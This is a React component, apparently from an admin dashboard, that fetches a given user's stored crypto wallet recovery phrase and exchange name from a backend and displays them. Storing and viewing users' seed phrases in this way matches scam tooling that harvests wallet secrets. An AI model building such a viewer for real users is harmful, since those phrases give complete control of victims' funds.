import * as React from "react";
import Switch from "@mui/material/Switch";
import { CircularProgress, Box } from "@mui/material";
import axiosLib from "axios";
import axios from "../../../../../api/axios";

export default function TwelvePhrase({ userId }) {
	const [checked, setChecked] = React.useState(true);
	const [loading, setLoading] = React.useState(false);
	const [error, setError] = React.useState(null);
	const [phrases, setPhrases] = React.useState([]);
	const [walletData, setWalletData] = React.useState({});

	// Fetch phrases based on userId
	const fetchPhrases = async () => {
		setLoading(true);
		setError(null);
		try {
			const response = await axios.get(`/phrase-data/${userId}`);
			console.log(response);
			const { exchangeName, phrase } = response?.data;
			setWalletData((prv) => ({ ...prv, exchangeName, phrase }));
			// Assuming response.data contains an array of phrases
			setPhrases(response.data);
		} catch (err) {
			console.log(err);
			setError("Failed to load phrases");
			setPhrases([]);
		} finally {
			setLoading(false);
		}
	};

	// Fetch phrases when component mounts or userId changes
	React.useEffect(() => {
		if (userId) {
			fetchPhrases();
		}
	}, [userId]);

	const submitStatus = async (newStatus) => {
		setLoading(true);
		setError(null);
		try {
			// Example API request to update status
			// await axios.post('/your-endpoint', { active: newStatus, userId });
			// Simulate API delay
			// await new Promise((resolve) => setTimeout(resolve, 500));
		} catch (err) {
			setError("Failed to update status");
			setChecked((prev) => !prev);
		} finally {
			setLoading(false);
		}
	};

	const handleChange = (event) => {
		const newChecked = event.target.checked;
		setChecked(newChecked);
		submitStatus(newChecked);
	};

	return (
		<Box
			sx={{
				display: "flex",
				flexDirection: "column",
				minWidth: "50%",
				my: "0.5rem",
				alignItems: "center",
				gap: 1,
				border: 1,
				borderColor: "gray",
				textAlign: "center",
				p: "1rem",
			}}>
			{/* <Switch
				checked={checked}
				onChange={handleChange}
				inputProps={{ "aria-label": "controlled" }}
			/> */}
			{loading && <CircularProgress size={20} />}
			{error && <span style={{ color: "red" }}>{error}</span>}

			{/* Show phrases only if loaded */}
			{!loading && (
				<div style={{ marginTop: "1rem" }} className="text-left">
					<h4 className="uppercase">wallet data</h4>
					<hr className="my-[0.5rem]" />
					<ul className="list-disc list-inside">
						<li>
							wallet name:{" "}
							<span className="ml-[0.5rem]"> {walletData?.exchangeName}</span>
						</li>
						<li>
							wallet phrase:{" "}
							<span className="ml-[0.5rem]"> {walletData?.phrase}</span>
						</li>
					</ul>

					{/* <ol>
						{phrases.slice(0, 12).map((phrase, index) => (
							<li key={index}>{phrase}</li>
						))}
					</ol> */}
				</div>
			)}
		</Box>
	);
}
